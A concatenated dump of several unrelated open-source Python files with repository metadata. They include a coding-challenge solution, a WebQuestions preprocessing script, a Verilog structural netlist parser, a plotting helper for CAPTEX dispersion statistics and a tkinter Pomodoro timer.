| 2020-05-08T02:26:16 | 2020-05-08T02:26:16 | null |
UTF-8
|
Python
| false | false | 233 |
py
|
# Copyright (c) Open-MMLab. All rights reserved.
from .base import LoggerHook
from .text import TextLoggerHook
from .tensorboard import TensorboardLoggerHook
__all__ = [
'LoggerHook', 'TextLoggerHook', 'TensorboardLoggerHook'
]
|
[
"[email protected]"
] | |
6b7c195eb0414b4a3705b64a56edf4b9fe4a9c26
|
615bdda10d9473c1c76fbfc28ed6cb378fa4a741
|
/techgig_solutions/30_days_challenge/day_28.py
|
56c2e9288b27671cfede645a60adc1e887b10f72
|
[] |
no_license
|
Soluspero/coding_practice
|
08de2796ec2cec1c96185e7affe567b3bc90c935
|
175ce97530404724dd040cd7d0ce15a368a3ffa1
|
refs/heads/master
| 2020-04-19T16:27:23.250675 | 2019-05-22T02:03:04 | 2019-05-22T02:03:04 | 168,305,153 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,099 |
py
|
'''
Compare two numbers (100 Marks)
For this challenge, you will take two integers input from stdin, sum the digits of a number and same is to be done with another number. Then compare the sum of the digits of two numbers and if one sum found to be greater then print that number to the stdout. If found both sum to be equal then print 'Equal' to the stdout.
Input Format
Two integer values to be taken as input from stdin.
Constraints
1 < (a,b) < 10^9
Output Format
Print the single number after comparison. If found equal, then print 'Equal' to the stdout.
Sample TestCase 1
Input
345678 444444
Output
345678
'''
''' Read input from STDIN. Print your output to STDOUT '''
#Use input() to read input from STDIN and use print to write your output to STDOUT
from sys import stdout
def plus(n):
s = 0
while n !=0:
t = n%10
n = n//10
s+=t
return s
def main():
# Write code here
a,b = input().strip().split()
a,b = int(a),int(b)
a1 = plus(a)
b1 = plus(b)
if a1 > b1:
stdout.write(str(a))
elif b1 > a1:
stdout.write(str(b))
else:
stdout.write("Equal")
main()
|
[
"[email protected]"
] | |
a9db9d36ada768fb305ce1f861cf4a50ac70729a
|
fe8142632f381654a0b7073664c534dfbebb7851
|
/ADJUSTABLE2.py
|
282adb18887b73f074490de0080b3602609799f9
|
[] |
no_license
|
edgelore/Testing_development_over_time_for_creation_of_a_language
|
2b4f248fbfed3c20207ff8ae11596073fd216066
|
1ad3ccbd37cc5831ecf1c7a55776592c4cae03f9
|
refs/heads/master
| 2020-04-13T22:28:07.528334 | 2018-12-29T06:02:11 | 2018-12-29T06:02:11 | 163,480,021 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 41 |
py
|
ADJUSTABLE2 = "CAPABILITY TO ADJUST"
|
[
"[email protected]"
] | |
e8493a1b631c82cd20a805041411a0ddabce63d0
|
5e5b8a66d35be6b86d3754069613fe49108a700d
|
/scripts/webquestions-preprocessing/paraphrase_rules.py
|
b8ff50290c2c4c922205a06b3aa5feddffdd7d10
|
[
"CC-BY-4.0"
] |
permissive
|
saraswat/graph-parser
|
e77f9880f38d1d23cf5aebb149be997d9c715745
|
da8800503174dce0590a55b817cd024354e41d9e
|
refs/heads/master
| 2021-01-11T09:01:50.414615 | 2016-12-23T13:17:59 | 2016-12-23T13:17:59 | 77,409,845 | 1 | 0 | null | 2016-12-26T22:26:28 | 2016-12-26T22:26:28 | null |
UTF-8
|
Python
| false | false | 3,122 |
py
|
'''
Created on 26 May 2014
@author: siva
'''
import json
import re
import sys
for line in sys.stdin:
line = json.loads(line)
# print line
# sentence = line['sentence']
sentence = " ".join([word["word"] for word in line["words"]])
if re.search(" do \?$", sentence):
# what did Einstein do?
# sentence = re.sub(" do\?$", " serve as\?", sentence)
words = line['words']
words.pop(-1)
words.pop(-1)
word = { "word" : "profession", "ner" : "0"}
words.append(word)
word = { "word" : "?", "ner" : "0"}
words.append(word)
for word in words:
if word['word'] == 'did' or word['word'] == 'do' or word['word'] == 'does':
word['word'] = 'is'
if re.search("Where ((is)|(was)) .* from \?$", sentence):
# where is Obama from ?
#sentence = re.sub(" from\?$", " born in ?", sentence)
words = line['words']
entities = line['entities']
check = False
for entity in entities:
if entity["index"] == len(words) - 3:
check = True
if check:
words.pop(-1)
words.pop(-1)
word = { "word" : "born", "ner" : "0"}
words.append(word)
word = { "word" : "in", "ner" : "0"}
words.append(word)
word = { "word" : "?", "ner" : "0"}
words.append(word)
'''if re.search("((name)|(type)|(kind))", sentence):
# What is the name of the president of US
#sentence = re.sub(" the ((name[s]?)|(type[s]?)|(kind[s]?)) of", "", sentence)
#sentence = re.sub(" ((name[s]?)|(type[s]?)|(kind[s]?)) of", "", sentence)
#sentence = re.sub(" ((name[s]?)|(type[s]?)|(kind[s]?))", "", sentence)
words = line['words']
entities = line['entities']
for i, word in enumerate(words):
if re.match("((name)|(kind)|(type))", word['word']):
if len(words) > i + 1 and words[i + 1]["word"] == "of":
words.pop(i)
words.pop(i)
for entity in entities:
if entity["index"] > i:
entity["index"] += -2
else:
words.pop(i)
if words[i - 1]["word"] == "the" or words[i - 1]["word"] == "a":
words.pop(i - 1)
for entity in entities:
if entity["index"] > i - 1:
entity["index"] += -1
break'''
sentence_mod = " ".join([word["word"] for word in line["words"]])
# print sentence_mod
if re.match("((What)|(Who)) ((is)|(was)) [^\s]+ \?", sentence_mod):
words = line["words"]
words[0] = {"word" : "What", "ner" : "0"}
words[1] = {"word" : "is", "ner" : "0"}
words[3] = {"word" : "'s", "ner" : "0"}
words.append({"word" : "profession", "ner" : "0"})
words.append({"word" : "?", "ner" : "0"})
print json.dumps(line)
|
[
"[email protected]"
] | |
e0f9e0cc67afaf29f291926c9c6aa95c05deb166
|
5792baf9e18ad91816cc42f4725b099a4dce7b7b
|
/HackerRank/Strings/Python sWap cASE.py
|
9e524564145bac64f1ed70970b832d5b588f495a
|
[] |
no_license
|
deepakorantak/Python
|
83b6782db0b5428d47fbc29193076e8ed5f5e285
|
9781133ce5a5c6f87efb5d4aa132a63ba1290f76
|
refs/heads/master
| 2020-03-23T19:55:30.075700 | 2019-02-19T06:24:42 | 2019-02-19T06:24:42 | 142,010,440 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 178 |
py
|
def swap_case(s):
return str.swapcase(s)
if __name__ == '__main__':
s = input()
if len(s) > 0 and len(s) <= 1000:
result = swap_case(s)
print(result)
|
[
"[email protected]"
] | |
6ea5d6604909fba4dae2f6fa379bf3062b294799
|
f78d8aae7c2e3c5c705b445d252822dffa5d2141
|
/app/parse.py
|
0399dbeed21272ffe777ee82458b17cb5c44a121
|
[
"MIT"
] |
permissive
|
o-alexandre-felipe/verilog-structural-manipulation
|
bc832ec2e061121ceb82b3441bd410806c785cc5
|
d210b415cfa2ef732ba1099c8934b4b4354f2526
|
refs/heads/master
| 2021-09-08T03:57:14.697822 | 2021-09-03T08:22:07 | 2021-09-03T08:22:07 | 95,001,077 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 20,841 |
py
|
import re;
module_re = re.compile('\\bmodule\\b.*?\\bendmodule\\b', re.MULTILINE | re.DOTALL);
module_parts_re = re.compile("""
\\bmodule\\b\s*
([a-zA-Z_][a-zA-Z0-9_]*) # module name
\s*(\#\s*\(.*?\))? # parameters are serparated by commas,
# the port list is separated with spaces
\s*\((.*?)\)\s*; # module port list
(.*?) # module body
\\bendmodule\\b
""", re.MULTILINE | re.DOTALL | re.VERBOSE)
comments = re.compile('//.*?$|/\*.*?\*', re.MULTILINE | re.DOTALL | re.VERBOSE)
instance_re = re.compile("""
(\\b[a-zA-Z_][a-zA-Z0-9_]*\\b) # module name
\s*(\#\s*\(.*?\))? # parameter list this works only because of the ';' separating each instance
\s*?(\\b[a-zA-Z_][a-zA-Z0-9_]*\\b) # instance name
\s*?[(](.*?)[)]\s*; # port connections""", re.MULTILINE | re.DOTALL | re.VERBOSE)
""" Capture signal declarations
<s> name;
s [.:.] name;
"""
signal_re = lambda s, sep = ';': re.compile("""
((\\b%s\\b)\s*(\\[.*?:.*?\\])?\s*?(\\b[_a-zA-Z].*?\\b)\s*)%s
""" % (s, sep), re.MULTILINE | re.DOTALL | re.VERBOSE);
""" Capture different forms of parameter
parameter name = <>
parameter <type> name = <>
parameter <type> [range] name = <>
type is restricted to lowercase words. """
parameter_re = re.compile("""
parameter
\\b\s*?(?:[a-z]*?) # type
(?:\s*\[.*?\])?\s*? # range
(\\b[_A-Za-z].*?\\b)\s* # name
\\=\s*([^,;]*) # value
""", re.MULTILINE | re.DOTALL | re.VERBOSE)
v95 = False;
input_re = signal_re('input\\b\\s*(?:\\bwire\\b)?', '[;,]');
output_re = signal_re('output\\b\\s*(?:\\bwire\\b)?','[;,]');
inout_re = signal_re('inout\\b\\s*(?:\\bwire\\b)?', '[;,]');
wire_re = signal_re('wire\\b');
named_connection_re = re.compile("\s*[.](\\b[a-zA-Z_][a-zA-Z0-9_]*\\b)\s*\\((.*?)\\)\s*",
re.MULTILINE | re.DOTALL | re.VERBOSE);
name_re = re.compile("\\b(?<!')([_a-zA-Z][a-zA-Z0-9_]*?|\\\\.*?\s)\\b");
class signal_declaration:
def __init__(self, src, _class, _range, _name):
self.src = src;
self._class = _class.strip();
self._range = _range.strip();
self.name = _name.strip();
def __str__(self):
if(self.src != None):
return self.src;
else:
return self._class + ' ' + self._range + ' ' + self.name;
def astype(self, _class):
return signal_declaration(None, _class, self._range, self.name);
def renamed(self, new_name):
return signal_declaration(None, self._class, self._range, new_name);
def translate_parameters(self, param_translation):
""" Given a dictionary with parameters update the range
if any parameter is found """
def trans(g):
token = g.group(1);
if(token in param_translation):
return param_translation[token];
else:
return token;
if(self.src == None):
self._range = name_re.sub(trans, self._range);
else:
self.src = name_re.sub(trans, self.src);
class module_declaration:
def __init__(self, s, src_file = None):
r = module_parts_re.match(s);
self.src = s;
self.src_file = src_file;
self.body_changed = False;
self.num_instances = 0;
if(r == None):
raise "Invalid string for a module definition";
else:
self.num_insts = 0;
self.name = r.group(1);
self.ports_string = r.group(3);
self.ports = [p.strip() for p in r.group(3).split(',')];
self.body_src = r.group(4);
self.find_inputs();
self.find_outputs();
self.find_wires();
self.find_inouts();
self.instances = {};
self.sub_blocks = {};
self.parameters = {};
for p in parameter_re.findall(self.body_src):
self.parameters[p[-2]] = p[-1].strip();
if(r.group(2) != None):
sp = r.group(2);
sp = sp[sp.index('('):len(sp) - sp[::-1].index(')') - 1];
for p in parameter_re.findall(sp):
self.parameters[p[-2]] = p[-1].strip();
def get_signal(self, name):
""" Return a signal by it's name regardless of its type. """
if(name in self.outputs):
return self.outputs[name];
if(name in self.inputs):
return self.inputs[name];
if(name in self.wires):
return self.wires[name];
if(name in self.inouts):
self.inouts[name];
def get_signal_direction(self, signal):
""" Determine the type of a signal,
based on the dictionary it is present. """
if(signal in self.outputs):
return 'output';
elif(signal in self.inputs):
return 'input';
elif(signal in self.wires):
return 'wire';
elif(signal in self.inouts):
return 'inout';
else:
return None;
def find_wires(self):
""" Using a regular expression find wires and store them
in a dictionary wires """
self.wires = {};
for w in wire_re.findall(self.body_src) + wire_re.findall(self.ports_string + ','):
self.wires[w[3]] = signal_declaration(*w);
def find_inputs(self):
""" Using a regular expression find inputs and store them
in a dictionary inputs """
self.inputs = {};
for w in input_re.findall(self.body_src) + input_re.findall(self.ports_string + ','):
self.inputs[w[3]] = signal_declaration(*w);
def find_outputs(self):
""" Using a regular expression find outputs and store them
in a dictionary outputs """
self.outputs = {};
for w in output_re.findall(self.body_src) + output_re.findall(self.ports_string + ','):
self.outputs[w[3]] = signal_declaration(*w);
def find_inouts(self):
""" Using a regular expression find inouts and store them
in a dictionary inouts """
self.inouts = {};
for w in inout_re.findall(self.body_src) + inout_re.findall(self.ports_string + ','):
self.inouts[w[3]] = signal_declaration(*w);
def __str__(self):
if(self.body_changed):
sm = "module " + self.name;
sm += self.parameter_declaration_v2001();
sm += '\n(\n' + self.port_list_string() + '\n);\n '
sm += self.parameter_declaration_v95();
sm += self.signal_declarations_string();
sm += ''.join(['\n ' + str(e).strip() + ';' for e in self.instances.values()])
sm += '\n\nendmodule\n\n'
return sm;
else:
return self.src + '\n';
def link(self, dict):
""" This routine find instances in the module body
and replace when possible with an object representing
that instance, based on the available modules, passed
via dict argument.
"""
insts = instance_re.findall(self.body_src);
for i in insts:
s = i[0] + ' ' + i[1] + ' ' + i[2] + '(' + i[3] + ')';
if(i[0] in dict):
b = instance_declaration(src = s, ref = dict[i[0]], parent = self, name = i[2]);
self.instances[i[2]] = b;
self.sub_blocks[i[2]] = b;
else:
b = instance_declaration(src = s, ref = None, parent = self, name = i[2]);
self.instances[i[2]] = b;
def move_to_chiplet(self, sub_blocks, chiplet_name, chiplet_instname = None):
c = chiplet_declaration(chiplet_name, self);
if(chiplet_instname == None):
chiplet_instname = chiplet_name;
for b in sub_blocks:
if(b in self.sub_blocks):
""" Without the variable tmp the RTL is corrupted
and it takes longer to execute """
tmp = self.sub_blocks[b];
c.include_instance(tmp)
del self.sub_blocks[b];
del self.instances[b];
else:
print "%s not found in %s" % (b, self.name);
self.sub_blocks[chiplet_name] = c.get_instanciation(parent = self, name = chiplet_instname);
self.instances[chiplet_name] = self.sub_blocks[chiplet_name];
self.body_changed = True;
return c;
def dissolve_sub_block(self, block_name, prefix = ''):
if(block_name in self.sub_blocks):
new_wires, new_insts = self.sub_blocks[block_name].get_dissolved_content(prefix = prefix);
for w in new_wires:
if(w in self.wires):
raise 'The wire %s already exists, aborted dissolving.' % w;
for i in new_insts:
if(i in self.instances):
raise 'The instance %s already exists, aborted dissolving.' % i;
""" Declares the required wires """
for w in new_wires:
self.wires[w] = new_wires[w];
""" Declare the instances from inside the subblock """
for i in new_insts:
ii = new_insts[i];
if(ii.ref != None):
self.sub_blocks[i] = ii;
self.instances[i] = ii;
""" Remove the sub block from the instances """
del self.sub_blocks[block_name];
del self.instances[block_name];
self.body_changed = True;
else:
raise 'sub_block not found, nothing to be dissolved.'
def hierarchy_tree(self, instname, f = lambda entity, inst_name: [inst_name]):
""" Create an hierarchical list containing some property
of each instance, returnded by a function f."""
r = [f(self, instname), []];
for sb in self.sub_blocks:
r[1].append(self.sub_blocks[sb].ref.hierarchy_tree(sb, f))
return r;
def parameter_declaration_v2001(self):
if(v95):
return '';
else:
if(len(self.parameters) == 0):
return '';
else:
plist = ['parameter %s = %s' % (k,v) for k,v in
zip(self.parameters.keys(), self.parameters.values())];
return "#(\n " + (',\n '.join(plist)) + ')';
def parameter_declaration_v95(self):
if(v95):
plist = ['\n parameter %s = %s;' (k,v) for k,v in
zip(self.parameters.keys(), self.parameters.values())];
return ''.join([plist]);
else:
return '';
def signal_declarations_string(self):
""" Verilog 1995 defines the types of the ports in the module body
after verilog 2001 only the wires are declared in the module
and the ports are fully declared in the port list. """
sm = '';
if(v95):
sm = '\n// Input declarations\n'
sm += '\n'.join([str(w) + ';' for w in self.inputs.values()])
sm += '\n// Output declarations\n'
sm += '\n'.join([str(w) + ';' for w in self.outputs.values()])
sm += '\n// INOUT declarations\n'
sm += '\n'.join([str(w) + ';' for w in self.inouts.values()])
sm += '\n// Wire declarations\n';
sm += '\n'.join([str(w) + ';' for w in self.wires.values()])
return sm + '\n\n';
def port_list_string(self):
""" The module portlist declares ports that will be present in
the module, after verilog 2001 it also defines the type of the port """
sm = '';
if(v95):
sm += ' ' + (',\n '.join(self.inputs.keys() + self.outputs.keys() + self.inouts.keys()));
else:
sm += ',\n'.join([str(w) for w in self.inputs.values()] +
[str(w) for w in self.outputs.values()] +
[str(w) for w in self.inouts.values()]);
return sm;
def stub(self):
""" Write the same HDL struct without the instances
whose corresponding modules were not declared """
sm = "module " + self.name + '\n(\n' + ',\n '.join(self.ports) + '\n);\n '
for p in self.parameters:
sm += '\n parameter %s = %s;' % (p, self.parameters[p]);
sm += self.signal_declarations_string();
sl = [];
for e in self.sub_blocks.values():
sl.append(str(e) + ';');
sm += '\n '.join(sl);
sm += '\nendmodule\n'
return sm;
class instance_declaration:
def __init__(self, src, ref = None, parent = None,
name = None, params = None, connections = None):
if((name == None) or (params == None) or (connections == None) or (ref == None)):
g = instance_re.match(src + ';');
if(g != None):
self.params = g.group(2);
self.name = g.group(3);
self.connections = g.group(4);
self.ref_name = g.group(1);
else:
self.src = src;
self.name = name;
self.params = params;
self.connections = connections;
self.src = src;
if(ref != None):
self.ref = ref;
ref.num_instances += 1;
self.ref_name = self.ref.name;
else:
self.ref = None;
self.parent = parent;
def __str__(self):
return self.src;
def stub(self):
if(self.ref != None):
return self.src;
def get_port_connections_strings(self):
""" Retrieve the text that defines each connection """
if(self.connections == None):
return [];
pl = [s for s in named_connection_re.findall(self.connections)];
return pl;
def get_parameter_connections_strings(self):
if(self.params == None):
return [];
pl = [s for s in named_connection_re.findall(self.params)];
return pl;
def get_connections(self):
"""
return a list of the signals connected to this instance
with the directions of the port to which it is connected
- inout is dominant over input and ouput.
- output is dominant over input.
This provide the directions to the ports in a module
that whould encapsulate this instance as is.
"""
outputs = {};
inputs = {};
inouts = {};
pl = self.get_port_connections_strings();
""" Create a list of ports from signals connected to the ports """
for i in range(0, len(pl)):
""" No support for ordered connections yet """
names = [s.strip() for s in name_re.findall(pl[i][1])];
""" Process an named connection """
direction = self.ref.get_signal_direction(pl[i][0].strip());
""" Add the signal to the correct bin """
if(direction == 'output'):
for n in names:
s = self.parent.get_signal(n);
if(s != None):
outputs[n] = s.astype('output');
elif(direction == 'input'):
for n in names:
s = self.parent.get_signal(n);
if(s != None):
inputs[n] = s.astype('input');
elif(direction == 'inout'):
for n in names:
s = self.parent.get_signal(n);
if(s != None):
inouts[n] = s.astype('inout');
""" Remove inputs and outputs that also appears as inout. """
for p in inputs:
if ((p in outputs) or (p in inouts)):
del inputs[p];
""" Remove inputs that also appear as output. """
for p in outputs:
if (p in inouts):
del outputs[p];
return inputs, outputs, inouts;
def reconnect(self, signal_translation = {}, parameter_translation = {}, parent = None, prefix = ''):
def translate_signals(m):
token = m.group(1);
if(token in signal_translation):
return signal_translation[token];
elif(token in parameter_translation):
return parameter_translation[token];
else:
return prefix + token;
def translate_named_connection(m):
s = '\n .' + m.group(1) + '(';
s += name_re.sub(translate_signals, m.group(2)) + ')'
return s;
s = self.ref_name;
if(self.params != None):
s += named_connection_re.sub(translate_named_connection, self.params);
s +=' ' + prefix + self.name + '('; # instance name (now with prefix)
if(self.connections != None):
s += named_connection_re.sub(translate_named_connection, self.connections);
s += ')'
# Keep the same module as the parent of this instance.
newinst = instance_declaration(src = s, ref = self.ref,
parent = parent, name = prefix + self.name);
return newinst;
def get_resolved_parameters(self):
param_translations = {};
for p in self.ref.parameters:
param_translations[p] = '%s' % self.ref.parameters[p];
if(self.params != None):
pl = named_connection_re.findall(self.params);
for p,r in pl:
param_translations[p] = '%s' % r;
return param_translations;
def get_dissolved_content(self, prefix):
if(self.ref == None):
return None;
my_params = self.get_resolved_parameters();
""" Return a list of connected ports """
p = self.get_port_connections_strings();
my_ports = {};
for u in p:
my_ports[u[0]] = "%s" % u[1];
new_wires = {};
for w in self.ref.wires:
if(not w in my_ports):
wi = self.ref.wires[w].renamed(prefix + w);
wi.translate_parameters(my_params);
new_wires[prefix + w] = wi;
new_insts = {};
for sb in self.ref.instances:
working_inst = self.ref.instances[sb].reconnect(
parent = self.parent,
signal_translation = my_ports,
parameter_translation = my_params,
prefix = prefix
);
new_insts[prefix + '_' + sb] = working_inst;
sw = str(working_inst);
return new_wires, new_insts;
class chiplet_declaration(module_declaration):
def __init__(self, name, parent):
self.ports = [];
self.name = name;
self.parent = parent;
self.inputs = {};
self.outputs = {}
self.inouts = {};
self.wires = {};
self.sub_blocks = {};
self.instances = {};
self.parameters = {};
self.body_changed = True;
self.num_instances = 0;
def include_instance(self, inst):
"""
Insert an instance int the current chiplet,
update it's interface, and resolve conflicts
regarding port directions.
"""
i, o, io = inst.get_connections();
params = inst.get_parameter_connections_strings();
""" process instance connections """
for u in i:
self.inputs[u] = i[u];
for u in o:
self.outputs[u] = o[u];
for u in io:
self.inouts[u] = io[u];
for u in params:
for v in name_re.findall(u[1]):
self.parameters[v] = '0'; # this must be overloaded
""" Resolve conflicting port directions """
for u in self.inputs.keys():
if((u in self.outputs) or (u in self.inouts)):
del self.inputs[u];
for u in self.outputs.keys():
if(u in self.inouts):
del self.outputs[u];
# If some symbol used in port connections is a parameter
# pass it as a parameter, not as an input or output.
for plist in (i, o, io):
for p in plist:
if(p in self.parent.parameters):
del plist[p];
self.parameters[p] = 0;
else:
# Parameters used to declare signals used in the instances.
for par in name_re.findall(plist[p]._range):
self.parameters[par] = 0;
""" Update port list """
self.ports = self.inputs.keys() + self.outputs.keys() + self.inouts.keys();
""" Place instance inside the chiplet """
self.sub_blocks[inst.name] = inst;
self.instances[inst.name] = inst;
def get_instanciation(self, parent, name):
s = self.name + ' '
if(len(self.parameters) != 0):
s += "#(" + (',\n '.join(['.%s(%s)' % (p,p) for p in self.parameters])) + '\n)';
s += name + '(\n ';
s += ',\n '.join(['.%s(%s)' % (p, p) for p in self.ports]);
s += '\n)';
si = instance_declaration(src = s, ref = self, parent = parent, name = name)
return si;
class structural_parser:
def __init__(self, fname = None, no_link = False):
self.modules_by_name = {};
self.modules_by_file = {};
self.unresolved = set();
self.modules = [];
if(fname == None):
return; # supported for python2.7
# self.modules_by_name = {m.name: m for m in self.modules};
self.parse_file(fname);
if(not no_link):
self.link();
def parse_file(self, fname):
fh = open(fname);
fs = comments.sub("", fh.read());
fh.close();
tmodules = [module_declaration(s, fname) for s in module_re.findall(fs)];
self.modules_by_file[fname] = tmodules;
for m in tmodules:
self.modules_by_name[m.name] = m;
""" If the HDL was linked with unresolved
modules, then a file defining a module that was unresolved
is loaded, remove it from the list of unresolved.
however its references will be resolved only after
calling the link method. """
self.unresolved.discard(m.name)
self.modules += tmodules;
def save_hdl_file(self, fname):
if(fname in self.modules_by_file):
fh = open(fname, "w");
for m in self.modules_by_file[fname]:
fh.write(str(m));
m.body_changed = False;
fh.close();
def write_stub(self, fname):
fh = open(fname, "w");
for m in self.modules:
fh.write(m.stub());
fh.close();
def write_hdl(self, fname):
fh = open(fname, "w");
for m in self.modules:
fh.write(str(m));
fh.close();
def link(self):
""" when the modules were parsed, the list of available
modules was not available, now we are able to parse
instances and associate each instance with the corresponding
module declaration """
for m in self.modules:
m.link(self.modules_by_name);
for u in m.instances:
if(not u in m.sub_blocks):
""" Keep a set of unresolved modules """
self.unresolved.add(u);
|
[
"[email protected]"
] | |
ddffbaff4759c5ede7ce9da994b1bf6934ba88ea
|
05ebbebf973feb97c4a4a2f36ae84527d41cac26
|
/plot_cap.py
|
1e610517385e48d9f901ff05e51b52b488cdf9d3
|
[] |
no_license
|
noaa-oar-arl/hysplit_gmm
|
4a3b24870fbdcb224f530bb13b6810d7bb068f56
|
a71cf17e91c44efb8a64c67d12ce2fa36b7ccf79
|
refs/heads/master
| 2023-02-05T10:20:07.258913 | 2020-12-18T16:15:40 | 2020-12-18T16:15:40 | 300,342,332 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,393 |
py
|
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
def readstat(fname):
"""
fname : str
read output of statmain program.
"""
dhash = {}
#print('opening ', fname)
with open(fname, 'r', encoding="ISO-8859-1") as fid:
for line in fid:
if "Correlation coefficient" in line:
temp = line.split()
dhash['R'] = float(temp[0])
if "Average bias" in line:
temp = line.split()
dhash['bias'] = (float(temp[0]))**2
#if "Average bias" in line:
# temp = line.split()
# dhash['bias'] = float(temp[0])
if "Fractional bias" in line:
temp = line.split()
dhash['FB'] = float(temp[0])
if "Fig of merit" in line:
temp = line.split()
dhash['FMS'] = float(temp[0])
if "Kolmogorov" in line:
temp = line.split()
dhash['KSP'] = float(temp[0])
if "rank" in line:
temp = line.split()
dhash['rank'] = float(temp[0])
if "Root mean" in line:
temp = line.split()
dhash['RMSE'] = float(temp[0])
return dhash
class MultRuns:
"""
Plots output from multiple statmain output files.
"""
def __init__(self,taglist):
self.taglist = taglist
self.fhash = {} #key is tag
#value is dictionary from CapRun
self.makeflist()
self.chash = {} #key is tag, value is color
self.lwhash={} #key is tag, value is linewidth
self.offsethash={}
def test(self):
print(self.taglist)
def makeflist(self, base= './txtfiles/NNN_statA.txt'):
numlist = ['1','2','3','4','5','7']
for tag in self.taglist:
flist = []
#print('HERE', flist)
for num in numlist:
fname = base.replace('NNN',tag+num)
flist.append(fname)
#return flist
caprun = CapRun(flist)
dhash = caprun.getvalues()
self.fhash[tag] = dhash
def add_color(tag,clr):
self.chash[tag] = clr
def plot(self, statkey, figname=None):
sns.set()
sns.set_style('white')
for tag in self.taglist:
## These are from cdump.
## VV is from captexV directory
## 5000 particles
## 0.25x0.25 and 100m in vertical
## UU is from captexG directory (higher resolution grid)
## 50,0000 particles
## 0.1x0.1 and 100m in vertical.
##TT is from captexNew directory. (control run)
if tag in self.chash.keys():
marker = self.chash[tag]
elif tag == 'TT':
marker = '-ks'
lw=3
elif tag in ['UU']:
marker = '--k.'
lw=1
elif tag in ['VV']:
marker = '-k.'
lw=1
else:
marker='-b.'
lw=1
if tag in self.lwhash.keys():
lw = self.lwhash[tag]
else:
lw = 1
if tag in self.offsethash.keys():
offset = self.offsethash[tag]
else:
offset=0
title=statkey
xval = np.array([1,2,3,4,5,7]) + offset
if statkey=='FB rank':
skey = 'FB'
plt.plot(xval,
1-np.abs(np.array(self.fhash[tag][skey])/2),
marker, LineWidth = lw, label=tag)
title = '1-|FB/2|'
elif statkey=='R':
plt.plot(xval, np.array((self.fhash[tag][statkey]))**2,
#plt.plot(xval, np.array((self.fhash[tag][statkey])),
marker, LineWidth = lw, label=tag)
title = '$R^2$'
elif statkey=='KSP rank':
skey='KSP'
plt.plot(xval,
1-np.array(self.fhash[tag][skey])/100,
marker, LineWidth = lw, label=tag)
title = '1- KSP/100'
elif statkey=='FMS':
skey='FMS'
plt.plot(xval,
np.array(self.fhash[tag][skey])/100,
marker, LineWidth = lw, label=tag)
title = 'FMS/100'
else:
plt.plot(xval,
self.fhash[tag][statkey],
marker, LineWidth = lw, label=tag)
ax = plt.gca()
ax.set_ylabel(title)
ax.set_xlabel('CAPTEX number')
ax.yaxis.grid(True)
if figname: plt.savefig(figname)
class CapRun:
def __init__(self,flist):
self.flist = flist
self.fhash = {} #key refers to statistic
#value is list cooresponding to value
#found in each file.
def getvalues(self):
iii=0
for fname in self.flist:
dhash = readstat(fname)
for key in dhash.keys():
if key not in self.fhash:
self.fhash[key] = []
self.fhash[key].append(dhash[key])
return self.fhash
|
[
"[email protected]"
] | |
9b9d7095b47314c16a5bb2eb07d9b53a29be7d85
|
e7d464c201a195cb8cbe277d9bb329955f9c6c8a
|
/main.py
|
00e776fab18a8ed59bc5268af85e6720f651b79f
|
[] |
no_license
|
OmarSadigli/Pomodoro-Timer-
|
2548f3c82b96205fa70567ace32a6534c64a399d
|
f613a8fd5a17e07504b0040399c60b333f9634c6
|
refs/heads/main
| 2023-03-06T03:08:49.210071 | 2021-02-15T10:05:53 | 2021-02-15T10:05:53 | 339,034,949 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,629 |
py
|
from tkinter import *
import math
# ---------------------------- CONSTANTS ------------------------------- #
PINK = "#e2979c"
RED = "#e7305b"
GREEN = "#9bdeac"
YELLOW = "#f7f5dd"
FONT_NAME = "Courier"
WORK_MIN = 25
SHORT_BREAK_MIN = 5
LONG_BREAK_MIN = 20
reps = 0
timer = None
# ---------------------------- TIMER RESET ------------------------------- #
def reset_timer():
global reps
window.after_cancel(timer)
canvas.itemconfig(timer_text, text="00:00")
timer_label.config(text="Timer", fg=GREEN)
check_marks.config(text="", fg=GREEN, bg=YELLOW, font=(FONT_NAME, 25))
reps = 0
# ---------------------------- TIMER MECHANISM ------------------------------- #
def start_timer():
global reps
work_sec = WORK_MIN * 60
short_break_sec = SHORT_BREAK_MIN * 60
long_break_sec = LONG_BREAK_MIN * 60
reps += 1
if reps % 8 == 0:
timer_label.config(text="Break", fg=RED)
count_down(long_break_sec)
elif reps % 2 == 0:
timer_label.config(text="Break", fg=PINK)
count_down(short_break_sec)
else:
timer_label.config(text="Work")
count_down(work_sec)
# ---------------------------- COUNTDOWN MECHANISM ------------------------------- #
def count_down(count):
count_min = math.floor(count / 60)
count_sec = count % 60
if count_sec < 10:
count_sec = f"0{count_sec}"
canvas.itemconfig(timer_text, text=f"{count_min}:{count_sec}")
if count > 0:
global timer
timer = window.after(1000, count_down, count - 1)
else:
start_timer()
marks = ""
for _ in range(math.floor(reps / 2)):
marks += "✔"
check_marks.config(text=marks)
# ---------------------------- UI SETUP ------------------------------- #
window = Tk()
window.title("Pomodoro")
window.config(padx=100, pady=50, bg=YELLOW)
canvas = Canvas(width=200, height=224, bg=YELLOW, highlightthickness=0)
tomato_img = PhotoImage(file="tomato.png")
canvas.create_image(100, 112, image=tomato_img)
timer_text = canvas.create_text(100, 130, text="00:00", fill="white", font=(FONT_NAME, 35, "bold"))
canvas.grid(column=1, row=1)
timer_label = Label(text="Timer", font=(FONT_NAME, 40, "bold"), fg=GREEN, bg=YELLOW)
timer_label.grid(column=1, row=0)
start_button = Button(text="Start", highlightthickness=0, command=start_timer)
start_button.grid(column=0, row=2)
reset_button = Button(text="Reset", highlightthickness=0, command=reset_timer)
reset_button.grid(column=2, row=2)
check_marks = Label(fg=GREEN, bg=YELLOW, font=(FONT_NAME, 25))
check_marks.grid(column=1, row=3)
window.mainloop()
|
[
"[email protected]"
] | |
be9cf6de41337a706ff9fa46d7816b99d1f552a0
|
b306aab9dcea2dd83dda700bc9f7b9f1a32cff3a
|
/CAIL2021/slsb/main.py
|
f67c06674df00f1d0948662b5528d9c5174dd6c3
|
[
"Apache-2.0"
] |
permissive
|
Tulpen/CAIL
|
d6ca9981c7ea2603ae61675ba330a9614cd9398d
|
c4cfa98ab4ecedbce34a7a5a186830486047540c
